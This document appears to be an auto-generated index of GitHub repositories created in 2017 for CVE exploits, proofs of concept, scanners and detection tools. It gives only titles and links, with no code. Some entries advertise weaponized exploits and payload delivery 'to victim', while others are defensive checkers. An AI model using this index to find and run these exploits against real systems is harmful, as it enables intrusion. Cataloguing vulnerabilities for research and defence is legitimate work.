**🚀 Server Directory Traversal at Huawei HG255s ☄️ - CVE-2017-17309 🚀** : [exploit-labs/huawei_hg255s_exploit](https://github.com/exploit-labs/huawei_hg255s_exploit) create time: 2017-10-23T13:57:27Z

**CVE-2017-5721 Proof-of-Concept** : [embedi/smm_usbrt_poc](https://github.com/embedi/smm_usbrt_poc) create time: 2017-10-23T11:00:18Z

**Wordpress Username Enumeration /CVE-2017-5487,WordPress < 4.7.1 -** : [teambugsbunny/wpUsersScan](https://github.com/teambugsbunny/wpUsersScan) create time: 2017-10-22T09:22:28Z

**Detects Windows and Linux systems with enabled Trusted Platform Modules (TPM) vulnerable to CVE-2017-15361. #nsacyber** : [nsacyber/Detect-CVE-2017-15361-TPM](https://github.com/nsacyber/Detect-CVE-2017-15361-TPM) create time: 2017-10-19T20:02:56Z

**Windows tool that analyzes your computer for Infineon TPM weak RSA keys (CVE-2017-15361)** : [jnpuskar/RocaCmTest](https://github.com/jnpuskar/RocaCmTest) create time: 2017-10-19T13:42:52Z

**An exploit for Apache Struts CVE-2017-5638** : [c002/Apache-Struts](https://github.com/c002/Apache-Struts) create time: 2017-10-19T02:40:45Z

**Dirty COW (CVE-2016-5195) Testing** : [titanhp/Dirty-COW-CVE-2016-5195-Testing](https://github.com/titanhp/Dirty-COW-CVE-2016-5195-Testing) create time: 2017-10-19T02:04:50Z

**Go package that checks if RSA keys are vulnerable to ROCA / CVE-2017-15361** : [titanous/rocacheck](https://github.com/titanous/rocacheck) create time: 2017-10-17T17:08:22Z

**Simple PowerShell script to check whether a computer is using an Infineon TPM chip that is vulnerable to CVE-2017-15361.** : [lva/Infineon-CVE-2017-15361](https://github.com/lva/Infineon-CVE-2017-15361) create time: 2017-10-17T14:07:45Z

**Very simple script to test for cve 2011-1575** : [masamoon/cve-2011-1575-poc](https://github.com/masamoon/cve-2011-1575-poc) create time: 2017-10-17T13:05:24Z

**PHPMailer < 5.2.18 Remote Code Execution** : [heikipikker/exploit-CVE-2016-10034](https://github.com/heikipikker/exploit-CVE-2016-10034) create time: 2017-10-17T07:25:06Z

**NexusPHP CSRF+XSS** : [ZZS2017/cve-2017-12792](https://github.com/ZZS2017/cve-2017-12792) create time: 2017-10-16T07:06:19Z

**no description** : [lr3800/CVE-2017-11816](https://github.com/lr3800/CVE-2017-11816) create time: 2017-10-13T07:05:55Z

**CVE-2016-0034 Decompile** : [DiamondHunters/CVE-2016-0034-Decompile](https://github.com/DiamondHunters/CVE-2016-0034-Decompile) create time: 2017-10-12T07:52:08Z

**CVE-2010-3332 Oracle Padding Vulnerability in Microsoft ASP.NET** : [bongbongco/MS10-070](https://github.com/bongbongco/MS10-070) create time: 2017-10-11T23:50:33Z

**Oracle Database TNS Listener Poison Attack Vulnerability** : [bongbongco/CVE-2012-1675](https://github.com/bongbongco/CVE-2012-1675) create time: 2017-10-11T23:46:24Z

**Apache HTTP Server 2.4.23 vulnerability study (CVE-2016-8740)** : [lcfpadilha/mac0352-ep4](https://github.com/lcfpadilha/mac0352-ep4) create time: 2017-10-11T23:42:49Z

**no description** : [homjxi0e/CVE-2017-9999_bypassing_General_Firefox](https://github.com/homjxi0e/CVE-2017-9999_bypassing_General_Firefox) create time: 2017-10-11T17:54:50Z

**Exploit Safari CVE-2017-7089** : [aymankhalfatni/Safari_Mac](https://github.com/aymankhalfatni/Safari_Mac) create time: 2017-10-11T15:09:45Z

**Ready to use, weaponized dirtycow (CVE-2016-5195)** : [arbll/dirtycow](https://github.com/arbll/dirtycow) create time: 2017-10-11T14:07:28Z

**Contrail: hard coded credentials (CVE-2017-10616) and XML External Entity (XXE) vulnerability (CVE-2017-10617)** : [gteissier/CVE-2017-10617](https://github.com/gteissier/CVE-2017-10617) create time: 2017-10-11T07:38:18Z

**Hidden AP with Deterministic Credentials** : [wiire-a/CVE-2017-9476](https://github.com/wiire-a/CVE-2017-9476) create time: 2017-10-10T11:25:36Z

**Blueborne CVE-2017-0781 Android heap overflow vulnerability** : [ojasookert/CVE-2017-0781](https://github.com/ojasookert/CVE-2017-0781) create time: 2017-10-09T15:13:25Z

**frp bypass without account overwrite** : [maviroxz/CVE-2016-8776](https://github.com/maviroxz/CVE-2016-8776) create time: 2017-10-08T12:26:23Z

**CVE-2017-13868: Information leak of uninitialized kernel heap data in XNU.** : [bazad/ctl_ctloutput-leak](https://github.com/bazad/ctl_ctloutput-leak) create time: 2017-10-07T09:42:05Z

**CVE-2017-12617 and CVE-2017-12615 for tomcat server** : [zi0Black/POC-CVE-2017-12615-or-CVE-2017-12717](https://github.com/zi0Black/POC-CVE-2017-12615-or-CVE-2017-12717) create time: 2017-10-06T22:04:23Z

**Exploits for the win32kfull!bFill vulnerability on Win10 x64 RS2 using Bitmap or Palette techniques** : [siberas/CVE-2016-3309_Reloaded](https://github.com/siberas/CVE-2016-3309_Reloaded) create time: 2017-10-06T07:59:07Z

**Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution** : [cyberheartmi9/CVE-2017-12617](https://github.com/cyberheartmi9/CVE-2017-12617) create time: 2017-10-05T23:41:52Z

**Scan/Exploit Blueborne CVE-2017-0785** : [pieterbork/blueborne](https://github.com/pieterbork/blueborne) create time: 2017-10-04T20:41:12Z

**Usbhijacking | CVE-2017-8464** : [X-Vector/usbhijacking](https://github.com/X-Vector/usbhijacking) create time: 2017-10-03T18:18:28Z

**Reproduction of iOS 11 bug CVE-2018-4110** : [bencompton/ios11-cookie-set-expire-issue](https://github.com/bencompton/ios11-cookie-set-expire-issue) create time: 2017-10-03T18:09:30Z

**Webkit uxss exploit (CVE-2017-7089)** : [Bo0oM/CVE-2017-7089](https://github.com/Bo0oM/CVE-2017-7089) create time: 2017-10-03T12:13:43Z

**POC checks for CVE-2017-6558, CVE-2017-14243 & CVE-2017-14244** : [GemGeorge/iBall-UTStar-CVEChecker](https://github.com/GemGeorge/iBall-UTStar-CVEChecker) create time: 2017-10-03T09:16:57Z

**this script is used for hack bluetooth devices CVE 2017 0785 which was done by ARMIS This File is password protected for password contact [email protected]** : [Hackerscript/BlueBorne-CVE-2017-0785](https://github.com/Hackerscript/BlueBorne-CVE-2017-0785) create time: 2017-10-02T18:21:43Z

**First script, pgp-cgi-cve-2012-1823 BASH script** : [gamamaru6005/oscp_scripts-1](https://github.com/gamamaru6005/oscp_scripts-1) create time: 2017-10-01T13:47:45Z

**no description** : [billa3283/CVE-2017-0213](https://github.com/billa3283/CVE-2017-0213) create time: 2017-10-01T13:29:59Z

**no description** : [own2pwn/blueborne-CVE-2017-1000251-POC](https://github.com/own2pwn/blueborne-CVE-2017-1000251-POC) create time: 2017-10-01T10:15:40Z

**SPRING DATA REST CVE-2017-8046 DEMO** : [Soontao/CVE-2017-8046-DEMO](https://github.com/Soontao/CVE-2017-8046-DEMO) create time: 2017-10-01T04:52:24Z

**test the CVE-2017-12852 in numpy v1.13.1 and v1.13.3 has fixed the bug** : [BT123/numpy-1.13.1](https://github.com/BT123/numpy-1.13.1) create time: 2017-09-30T05:21:48Z

**CVE-2017-12943** : [aymankhalfatni/D-Link](https://github.com/aymankhalfatni/D-Link) create time: 2017-09-29T12:18:40Z

**no description** : [lizhi16/CVE-2017-5638](https://github.com/lizhi16/CVE-2017-5638) create time: 2017-09-28T08:43:21Z

**clone** : [tlatkdgus1/blueborne-CVE-2017-1000251](https://github.com/tlatkdgus1/blueborne-CVE-2017-1000251) create time: 2017-09-28T02:12:57Z

**OptionsBleed (CVE-2017-9798) PoC / Scanner** : [brokensound77/OptionsBleed-POC-Scanner](https://github.com/brokensound77/OptionsBleed-POC-Scanner) create time: 2017-09-27T03:28:22Z

**Utility to derive the shared secret on a JitBit Helpdesk install which can be used for authentication bypass (CVE-2017-18486)** : [Kc57/JitBit_Helpdesk_Auth_Bypass](https://github.com/Kc57/JitBit_Helpdesk_Auth_Bypass) create time: 2017-09-26T17:51:01Z

**An Ubuntu 16.04 VM Vulnerable to CVE 2017-5638** : [evolvesecurity/vuln-struts2-vm](https://github.com/evolvesecurity/vuln-struts2-vm) create time: 2017-09-26T17:36:21Z

**no description** : [kavgan/vuln_test_repo_public_ruby_gemfile_cve-2016-6317](https://github.com/kavgan/vuln_test_repo_public_ruby_gemfile_cve-2016-6317) create time: 2017-09-26T16:42:26Z

**This is the Pwn2Own 2017 Safari backup vul's exploit.** : [xuechiyaobai/CVE-2017-7092-PoC](https://github.com/xuechiyaobai/CVE-2017-7092-PoC) create time: 2017-09-26T04:10:32Z

**[CVE-2017-10235] Description and PoC of VirtualBox E1000 device Buffer Overflow** : [fundacion-sadosky/vbox_cve_2017_10235](https://github.com/fundacion-sadosky/vbox_cve_2017_10235) create time: 2017-09-25T20:42:47Z

**just a python script for cve-2017-12615** : [mefulton/cve-2017-12615](https://github.com/mefulton/cve-2017-12615) create time: 2017-09-25T11:53:02Z

**Check for Struts Vulnerability CVE-2017-5638** : [invisiblethreat/strutser](https://github.com/invisiblethreat/strutser) create time: 2017-09-25T00:40:57Z

**no description** : [l0n3rs/CVE-2017-8759](https://github.com/l0n3rs/CVE-2017-8759) create time: 2017-09-24T06:58:55Z

**no description** : [l0n3rs/CVE-2017-9798](https://github.com/l0n3rs/CVE-2017-9798) create time: 2017-09-24T06:51:32Z

**Metasploit module for Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability** : [xfer0/CVE-2017-9791](https://github.com/xfer0/CVE-2017-9791) create time: 2017-09-23T19:08:31Z

**Blueborne CVE-2017-1000251 PoC for linux machines** : [hayzamjs/Blueborne-CVE-2017-1000251](https://github.com/hayzamjs/Blueborne-CVE-2017-1000251) create time: 2017-09-23T06:29:31Z

**POC Exploit for Apache Tomcat 7.0.x CVE-2017-12615 PUT JSP vulnerability.** : [breaktoprotect/CVE-2017-12615](https://github.com/breaktoprotect/CVE-2017-12615) create time: 2017-09-23T06:15:48Z

**CVE-2017-0785 BlueBorne PoC** : [Alfa100001/-CVE-2017-0785-BlueBorne-PoC](https://github.com/Alfa100001/-CVE-2017-0785-BlueBorne-PoC) create time: 2017-09-22T22:03:40Z

**CVE-2017-0785: BlueBorne PoC** : [aymankhalfatni/CVE-2017-0785](https://github.com/aymankhalfatni/CVE-2017-0785) create time: 2017-09-22T20:33:12Z

**CVE-2017-7173: Local denial of service for iOS requiring root privileges.** : [bazad/sysctl_coalition_get_pid_list-dos](https://github.com/bazad/sysctl_coalition_get_pid_list-dos) create time: 2017-09-22T04:04:05Z

**Blueborne CVE-2017-0785 Android information leak vulnerability** : [ojasookert/CVE-2017-0785](https://github.com/ojasookert/CVE-2017-0785) create time: 2017-09-20T23:32:29Z

**CVE-2017-9798** : [pabloec20/optionsbleed](https://github.com/pabloec20/optionsbleed) create time: 2017-09-20T18:44:17Z

**no description** : [viethdgit/CVE-2017-0199](https://github.com/viethdgit/CVE-2017-0199) create time: 2017-09-19T12:38:47Z

**Two versions of CVE-2017-8759 exploits** : [ashr/CVE-2017-8759-exploits](https://github.com/ashr/CVE-2017-8759-exploits) create time: 2017-09-19T06:12:10Z

**Checks a shared hosting environment for CVE-2017-9798** : [nitrado/CVE-2017-9798](https://github.com/nitrado/CVE-2017-9798) create time: 2017-09-18T15:17:13Z

**CVE-2017-8759** : [Securitykid/CVE-2017-8759](https://github.com/Securitykid/CVE-2017-8759) create time: 2017-09-18T05:35:57Z

**Simple C# implementation of CVE-2017-8759** : [JonasUliana/CVE-2017-8759](https://github.com/JonasUliana/CVE-2017-8759) create time: 2017-09-17T22:05:56Z

**A proof of concept for Joomla's CVE-2015-8562 vulnerability (Object Injection RCE)** : [VoidSec/Joomla_CVE-2015-8562](https://github.com/VoidSec/Joomla_CVE-2015-8562) create time: 2017-09-17T15:03:53Z

**no description** : [homjxi0e/CVE-2017-7912_Sneak](https://github.com/homjxi0e/CVE-2017-7912_Sneak) create time: 2017-09-16T12:27:48Z

**CVE-2017-8759** : [Lz1y/CVE-2017-8759](https://github.com/Lz1y/CVE-2017-8759) create time: 2017-09-15T00:36:17Z

**Exploit toolkit CVE-2017-8759 - v1.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft .NET Framework RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.** : [bhdresh/CVE-2017-8759](https://github.com/bhdresh/CVE-2017-8759) create time: 2017-09-14T10:04:39Z

**CVE-2017-8759 Remote Code Execution Vulnerability On SOAP WDSL - Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 3.5.1 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 3.5** : [homjxi0e/CVE-2017-8759_-SOAP_WSDL](https://github.com/homjxi0e/CVE-2017-8759_-SOAP_WSDL) create time: 2017-09-14T06:20:28Z

**no description** : [tahisaad6/CVE-2017-8759-Exploit-sample2](https://github.com/tahisaad6/CVE-2017-8759-Exploit-sample2) create time: 2017-09-13T20:31:43Z

**CVE-2017-8759 Research** : [BasuCert/CVE-2017-8759](https://github.com/BasuCert/CVE-2017-8759) create time: 2017-09-13T20:27:29Z

**CVE-2017-8759 - A vulnerability in the SOAP WDSL parser.** : [vysecurity/CVE-2017-8759](https://github.com/vysecurity/CVE-2017-8759) create time: 2017-09-13T17:10:18Z

**NCC Group's analysis and exploitation of CVE-2017-8759 along with further refinements** : [nccgroup/CVE-2017-8759](https://github.com/nccgroup/CVE-2017-8759) create time: 2017-09-13T15:24:10Z

**Running CVE-2017-8759 exploit sample.** : [Voulnet/CVE-2017-8759-Exploit-sample](https://github.com/Voulnet/CVE-2017-8759-Exploit-sample) create time: 2017-09-13T09:50:04Z

**Struts 2 web app that is vulnerable to CVE-2017-98505 and CVE-2017-5638** : [mike-williams/Struts2Vuln](https://github.com/mike-williams/Struts2Vuln) create time: 2017-09-13T09:01:34Z

**An exploit for Apache Struts CVE-2017-9805** : [Lone-Ranger/apache-struts-pwn_CVE-2017-9805](https://github.com/Lone-Ranger/apache-struts-pwn_CVE-2017-9805) create time: 2017-09-10T05:26:03Z

**An exploit for Apache Struts CVE-2017-9805** : [mazen160/struts-pwn_CVE-2017-9805](https://github.com/mazen160/struts-pwn_CVE-2017-9805) create time: 2017-09-09T01:32:57Z

**no description** : [zzz66686/CVE-2017-14263](https://github.com/zzz66686/CVE-2017-14263) create time: 2017-09-08T07:27:13Z

**no description** : [zzz66686/CVE-2017-14262](https://github.com/zzz66686/CVE-2017-14262) create time: 2017-09-08T02:59:21Z

**A simple script for exploit RCE for Struts 2 S2-053(CVE-2017-12611)** : [brianwrf/S2-053-CVE-2017-12611](https://github.com/brianwrf/S2-053-CVE-2017-12611) create time: 2017-09-08T02:50:37Z

**cve -2017-9805** : [hahwul/struts2-rce-cve-2017-9805-ruby](https://github.com/hahwul/struts2-rce-cve-2017-9805-ruby) create time: 2017-09-07T08:49:14Z

**CVE 2017-9805** : [luc10/struts-rce-cve-2017-9805](https://github.com/luc10/struts-rce-cve-2017-9805) create time: 2017-09-06T08:32:01Z

**no description** : [siling2017/CVE-2017-1000117](https://github.com/siling2017/CVE-2017-1000117) create time: 2017-09-04T04:18:19Z

**no description** : [theguly/CVE-2017-14105](https://github.com/theguly/CVE-2017-14105) create time: 2017-09-01T14:51:31Z

**WolfCMS-v0.8.3.1 Cross Site Scripting(XSS) Assigned CVE Number: CVE-2017-11611** : [faizzaidi/Wolfcms-v0.8.3.1-xss-POC-by-Provensec-llc](https://github.com/faizzaidi/Wolfcms-v0.8.3.1-xss-POC-by-Provensec-llc) create time: 2017-08-25T03:19:05Z

**no description** : [TamiiLambrado/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner](https://github.com/TamiiLambrado/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner) create time: 2017-08-24T07:36:14Z

**Denial of service by Exit in Terminal !!** : [homjxi0e/CVE-2017-7998](https://github.com/homjxi0e/CVE-2017-7998) create time: 2017-08-23T08:17:10Z

**Bypass Feature UMCI in Internet Explorer** : [homjxi0e/CVE-2017-8625_Bypass_UMCI](https://github.com/homjxi0e/CVE-2017-8625_Bypass_UMCI) create time: 2017-08-21T20:14:07Z

**There is a classic heap overflow when eval a string which large enough in Chakra! This issue can be reproduced steadly in uptodate Edge in Win10 WIP. An exception will occur immediatly when opening POC.html in Edge.** : [homjxi0e/CVE-2017-8641_chakra_Js_GlobalObject](https://github.com/homjxi0e/CVE-2017-8641_chakra_Js_GlobalObject) create time: 2017-08-21T20:11:11Z

**test for CVE-2017-1000117** : [chenzhuo0618/test](https://github.com/chenzhuo0618/test) create time: 2017-08-21T07:46:16Z

**Joomla 1.7.3 - 3.7.2 CSRF exploit PoC** : [xyringe/CVE-2017-9934](https://github.com/xyringe/CVE-2017-9934) create time: 2017-08-20T17:23:44Z

**CVE-2016-7608: Buffer overflow in IOFireWireFamily.** : [bazad/IOFireWireFamily-overflow](https://github.com/bazad/IOFireWireFamily-overflow) create time: 2017-08-19T20:49:26Z

**Automatic execution Payload From Windows By Path Users All Exploit Via File bashrc** : [homjxi0e/CVE-2017-9779](https://github.com/homjxi0e/CVE-2017-9779) create time: 2017-08-18T18:30:42Z

**GitのCommand Injectionの脆弱性を利用してスクリプトを落として実行する例** : [nkoneko/CVE-2017-1000117](https://github.com/nkoneko/CVE-2017-1000117) create time: 2017-08-18T16:23:53Z

**CVE-2017-2368 VCF Message App Crash Bug** : [vincedes3/CVE-2017-2368](https://github.com/vincedes3/CVE-2017-2368) create time: 2017-08-18T09:33:57Z

**An EXP could run on Windows x64 against CVE-2008-4654.** : [KernelErr/VLC-CVE-2008-4654-Exploit](https://github.com/KernelErr/VLC-CVE-2008-4654-Exploit) create time: 2017-08-18T05:22:29Z

**no description** : [ikmski/CVE-2017-1000117](https://github.com/ikmski/CVE-2017-1000117) create time: 2017-08-17T00:37:47Z

**no description** : [takehaya/CVE-2017-1000117](https://github.com/takehaya/CVE-2017-1000117) create time: 2017-08-16T14:34:37Z

**Experiment of CVE-2017-1000117** : [ieee0824/CVE-2017-1000117-sl](https://github.com/ieee0824/CVE-2017-1000117-sl) create time: 2017-08-16T04:01:08Z

**CVE-2017-1000117** : [rootclay/CVE-2017-1000117](https://github.com/rootclay/CVE-2017-1000117) create time: 2017-08-16T03:52:27Z

**no description** : [ieee0824/CVE-2017-1000117](https://github.com/ieee0824/CVE-2017-1000117) create time: 2017-08-16T02:05:08Z

**https://github.com/greymd/CVE-2017-1000117 の勉強用** : [bells17/CVE-2017-1000117](https://github.com/bells17/CVE-2017-1000117) create time: 2017-08-16T02:04:02Z

**CVE-2017-1000117の検証** : [Shadow5523/CVE-2017-1000117-test](https://github.com/Shadow5523/CVE-2017-1000117-test) create time: 2017-08-15T12:24:57Z

**no description** : [sasairc/CVE-2017-1000117_wasawasa](https://github.com/sasairc/CVE-2017-1000117_wasawasa) create time: 2017-08-15T08:39:23Z

**no description** : [shogo82148/Fix-CVE-2017-1000117](https://github.com/shogo82148/Fix-CVE-2017-1000117) create time: 2017-08-15T01:40:18Z

**Check Git's vulnerability CVE-2017-1000117** : [greymd/CVE-2017-1000117](https://github.com/greymd/CVE-2017-1000117) create time: 2017-08-14T15:05:48Z

**no description** : [sm-paul-schuette/CVE-2017-12426](https://github.com/sm-paul-schuette/CVE-2017-12426) create time: 2017-08-14T12:18:15Z

**no description** : [Xhendos/CVE-2017-5638](https://github.com/Xhendos/CVE-2017-5638) create time: 2017-08-12T23:00:14Z

**no description** : [VulApps/CVE-2017-1000117](https://github.com/VulApps/CVE-2017-1000117) create time: 2017-08-12T18:20:02Z

**test** : [alilangtest/CVE-2017-1000117](https://github.com/alilangtest/CVE-2017-1000117) create time: 2017-08-12T14:14:55Z

**no description** : [thelastbyte/CVE-2017-1000117](https://github.com/thelastbyte/CVE-2017-1000117) create time: 2017-08-12T01:10:49Z

**no description** : [Manouchehri/CVE-2017-1000117](https://github.com/Manouchehri/CVE-2017-1000117) create time: 2017-08-11T20:47:53Z

**Repo to test the new git vulnerability** : [GrahamMThomas/test-git-vuln_CVE-2017-1000117](https://github.com/GrahamMThomas/test-git-vuln_CVE-2017-1000117) create time: 2017-08-11T18:05:01Z

**A multifunctional tool for checking and exploiting the Shellshock(a. k. a. Bashd00r) vulnerabilty. CVE 2014-6271. Created for Python 2.7.13.** : [r4z0r5/SwissArmyShellshocker](https://github.com/r4z0r5/SwissArmyShellshocker) create time: 2017-08-11T11:34:13Z

**poc for cve-2017-10661** : [GeneBlue/CVE-2017-10661_POC](https://github.com/GeneBlue/CVE-2017-10661_POC) create time: 2017-08-11T10:45:10Z

**Proof of concept of CVE-2017-1000117** : [timwr/CVE-2017-1000117](https://github.com/timwr/CVE-2017-1000117) create time: 2017-08-11T07:03:23Z

**This is an exploit for CVE-2017-7047, Works on 10.3.2 and below.** : [q1f3/Triple_fetch](https://github.com/q1f3/Triple_fetch) create time: 2017-08-10T11:24:47Z

**this tool can generate a exp for cve-2017-8486, it is developed by python** : [Securitykid/CVE-2017-8464-exp-generator](https://github.com/Securitykid/CVE-2017-8464-exp-generator) create time: 2017-08-07T11:56:11Z

**Attempt to steal kernelcredentials from launchd + task_t pointer (Based on: CVE-2017-7047)** : [JosephShenton/Triple_Fetch-Kernel-Creds](https://github.com/JosephShenton/Triple_Fetch-Kernel-Creds) create time: 2017-08-05T03:23:13Z

**CVE-2017-2388: Null-pointer dereference in IOFireWireFamily.** : [bazad/IOFireWireFamily-null-deref](https://github.com/bazad/IOFireWireFamily-null-deref) create time: 2017-08-04T19:35:20Z

**CVE-2017-5645 - Apache Log4j RCE due Insecure Deserialization** : [pimps/CVE-2017-5645](https://github.com/pimps/CVE-2017-5645) create time: 2017-08-04T01:12:47Z

**CVE-2016-0040 Privilege Escalation Exploit For WMI Receive Notification Vulnerability (x86-64)** : [de7ec7ed/CVE-2016-0040](https://github.com/de7ec7ed/CVE-2016-0040) create time: 2017-08-03T22:28:54Z

**Support x86 and x64** : [3gstudent/CVE-2017-8464-EXP](https://github.com/3gstudent/CVE-2017-8464-EXP) create time: 2017-08-02T02:14:37Z

**Exploit for Jenkins serialization vulnerability - CVE-2016-0792** : [jpiechowka/jenkins-cve-2016-0792](https://github.com/jpiechowka/jenkins-cve-2016-0792) create time: 2017-07-30T18:39:24Z

**Broadpwn bug (CVE-2017-9417)** : [mailinneberg/Broadpwn](https://github.com/mailinneberg/Broadpwn) create time: 2017-07-29T22:23:34Z

**ProFTPd 1.3.5 - File Copy** : [davidtavarez/CVE-2015-3306](https://github.com/davidtavarez/CVE-2015-3306) create time: 2017-07-29T04:31:10Z

**搭建漏洞利用测试环境** : [Zer0d0y/Samba-CVE-2017-7494](https://github.com/Zer0d0y/Samba-CVE-2017-7494) create time: 2017-07-28T06:21:29Z

**CVE-2017-5689 Proof-of-Concept exploit** : [embedi/amt_auth_bypass_poc](https://github.com/embedi/amt_auth_bypass_poc) create time: 2017-07-27T21:06:08Z

**ppsx file generator for cve-2017-8570 (based on bhdresh/cve-2017-8570)** : [temesgeny/ppsx-file-generator](https://github.com/temesgeny/ppsx-file-generator) create time: 2017-07-24T18:35:26Z

**Exploit created by: R4v3nBl4ck end Pacman** : [R4v3nBl4ck/Apache-Struts-2-CVE-2017-5638-Exploit-](https://github.com/R4v3nBl4ck/Apache-Struts-2-CVE-2017-5638-Exploit-) create time: 2017-07-24T05:05:28Z

**no description** : [liusec/WP-CVE-2016-10033](https://github.com/liusec/WP-CVE-2016-10033) create time: 2017-07-22T03:20:41Z

**Proof of concept for ZRTP man-in-the-middle** : [gteissier/CVE-2016-6271](https://github.com/gteissier/CVE-2016-6271) create time: 2017-07-21T22:57:04Z

**CVE-2014-9322 (a.k.a BadIRET) proof of concept for Linux** : [RKX1209/CVE-2014-9322](https://github.com/RKX1209/CVE-2014-9322) create time: 2017-07-19T10:06:37Z

**no description** : [liusec/CVE-2017-7529](https://github.com/liusec/CVE-2017-7529) create time: 2017-07-19T09:55:42Z

**An internet scanner for exploit CVE-2017-0144 (Eternal Blue) & CVE-2017-0145 (Eternal Romance)** : [peterpt/eternal_scanner](https://github.com/peterpt/eternal_scanner) create time: 2017-07-16T19:44:04Z

**php_cve-2014-8142_cve-2015-0231的漏洞环境docker** : [3xp10it/php_cve-2014-8142_cve-2015-0231](https://github.com/3xp10it/php_cve-2014-8142_cve-2015-0231) create time: 2017-07-09T06:06:28Z

**None** : [beraphin/CVE-2017-8890](https://github.com/beraphin/CVE-2017-8890) create time: 2017-07-09T06:03:37Z

**no description** : [homjxi0e/CVE-2017-4490-install-Script-Python-in-Terminal-](https://github.com/homjxi0e/CVE-2017-4490-install-Script-Python-in-Terminal-) create time: 2017-07-07T20:21:51Z

**CVE-2017-9791** : [dragoneeg/Struts2-048](https://github.com/dragoneeg/Struts2-048) create time: 2017-07-07T18:27:31Z

**Apache struts struts 2 048, CVE-2017-9791.** : [IanSmith123/s2-048](https://github.com/IanSmith123/s2-048) create time: 2017-07-07T12:35:55Z

**CVE-2014-1303 (WebKit Heap based BOF) proof of concept for Linux** : [RKX1209/CVE-2014-1303](https://github.com/RKX1209/CVE-2014-1303) create time: 2017-07-07T06:15:56Z

**Struts 2 DefaultActionMapper Interactive Shell Exploit for CVE-2013-225 [S2-016]** : [ninj4c0d3r/ShellEvil](https://github.com/ninj4c0d3r/ShellEvil) create time: 2017-07-05T06:44:39Z

**POC for java RMI deserialization vulnerability** : [xfei3/CVE-2017-3241-POC](https://github.com/xfei3/CVE-2017-3241-POC) create time: 2017-07-04T13:05:46Z

**VideoLAN VLC media player 0.9.4 Media Player ty.c buffer overflow** : [bongbongco/CVE-2008-4654](https://github.com/bongbongco/CVE-2008-4654) create time: 2017-07-02T23:33:30Z

**The Joomanager component through 2.0.0 for Joomla! has an Arbitrary File Download issue, resulting in exposing the Credentials of the DataBase.** : [Luth1er/CVE-2017-18345-COM_JOOMANAGER-ARBITRARY-FILE-DOWNLOAD](https://github.com/Luth1er/CVE-2017-18345-COM_JOOMANAGER-ARBITRARY-FILE-DOWNLOAD) create time: 2017-07-01T19:02:45Z

**CVE-2017-0213 for command line** : [zcgonvh/CVE-2017-0213](https://github.com/zcgonvh/CVE-2017-0213) create time: 2017-07-01T16:07:04Z

**no description** : [sUbc0ol/CVE-2015-0235](https://github.com/sUbc0ol/CVE-2015-0235) create time: 2017-06-30T10:29:40Z

**no description** : [sUbc0ol/Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638](https://github.com/sUbc0ol/Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638) create time: 2017-06-30T09:55:41Z

**no description** : [sUbc0ol/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner](https://github.com/sUbc0ol/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner) create time: 2017-06-30T09:40:31Z

**no description** : [sUbc0ol/Detection-for-CVE-2017-2793](https://github.com/sUbc0ol/Detection-for-CVE-2017-2793) create time: 2017-06-30T09:32:42Z

**no description** : [sUbc0ol/Microsoft-Word-CVE-2017-0199-](https://github.com/sUbc0ol/Microsoft-Word-CVE-2017-0199-) create time: 2017-06-30T09:08:40Z

**FreeSSHD Remote Authentication Bypass Vulnerability (freeSSHd 2.1.3)** : [bongbongco/CVE-2012-6066](https://github.com/bongbongco/CVE-2012-6066) create time: 2017-06-30T02:15:03Z

**no description** : [shaheemirza/CVE-2017-0213-](https://github.com/shaheemirza/CVE-2017-0213-) create time: 2017-06-29T18:49:44Z

**CVE-2015-1635** : [bongbongco/MS15-034](https://github.com/bongbongco/MS15-034) create time: 2017-06-29T04:38:25Z

**no description** : [qwertyuiop12138/CVE-2016-10033](https://github.com/qwertyuiop12138/CVE-2016-10033) create time: 2017-06-28T07:09:54Z

**no description** : [homjxi0e/CVE-2017-3078](https://github.com/homjxi0e/CVE-2017-3078) create time: 2017-06-26T09:34:59Z

**BlackCat-CMS-Bundle-v1.2 Cross Site Scripting(XSS) Assigned CVE Number: CVE-2017-9609** : [faizzaidi/Blackcat-cms-v1.2-xss-POC-by-Provensec-llc](https://github.com/faizzaidi/Blackcat-cms-v1.2-xss-POC-by-Provensec-llc) create time: 2017-06-21T09:30:58Z

**InSpec profile to verify a node is patched and compliant for CVE-2017-8543** : [americanhanko/windows-security-cve-2017-8543](https://github.com/americanhanko/windows-security-cve-2017-8543) create time: 2017-06-19T00:15:09Z

**os experiment 4 CVE-2016-5195** : [FloridSleeves/os-experiment-4](https://github.com/FloridSleeves/os-experiment-4) create time: 2017-06-16T13:53:46Z

**no description** : [Houl777/CVE-2017-9606](https://github.com/Houl777/CVE-2017-9606) create time: 2017-06-14T04:30:36Z

**no description** : [homjxi0e/tool-New-my-CVE-2017](https://github.com/homjxi0e/tool-New-my-CVE-2017) create time: 2017-06-13T23:43:08Z

**CVE-2017-5638 Test environment** : [eeehit/CVE-2017-5638](https://github.com/eeehit/CVE-2017-5638) create time: 2017-06-13T06:59:15Z

**no description** : [homjxi0e/CVE-2017-5638](https://github.com/homjxi0e/CVE-2017-5638) create time: 2017-06-08T21:47:11Z

**own implementation of the CVE-2017-1000367 sudo privilege escalation vulnerability in python** : [pucerpocok/sudo_exploit](https://github.com/pucerpocok/sudo_exploit) create time: 2017-06-08T08:37:38Z

**no description** : [homjxi0e/CVE-2017-9430](https://github.com/homjxi0e/CVE-2017-9430) create time: 2017-06-08T06:22:37Z

**Struts-RCE CVE-2017-5638** : [riyazwalikar/struts-rce-cve-2017-5638](https://github.com/riyazwalikar/struts-rce-cve-2017-5638) create time: 2017-06-08T05:22:31Z

**no description** : [homjxi0e/CVE-2017-2671](https://github.com/homjxi0e/CVE-2017-2671) create time: 2017-06-08T04:28:31Z

